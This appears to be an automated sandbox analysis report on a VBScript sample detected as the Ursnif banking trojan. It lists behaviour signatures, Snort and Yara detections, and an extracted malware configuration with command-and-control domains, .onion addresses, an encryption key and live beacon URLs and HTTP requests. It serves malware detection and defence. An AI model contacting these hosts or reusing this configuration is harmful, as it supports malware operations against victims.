Windows Analysis Report 345678.vbs

Overview

General Information

Sample Name: 345678.vbs
Analysis ID: 481077
MD5: 9e6b216f5112b583f035ac621c78ea4e
SHA1: 8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
SHA256: cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/t Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com Virustotal: Detection: 8% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_00E53276
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05591802
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05581577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_055714A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05586E4E

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49789 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49789 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253 185.251.90.253
Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P
Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/t
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmp String found in binary or memory: http://crl.m5
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
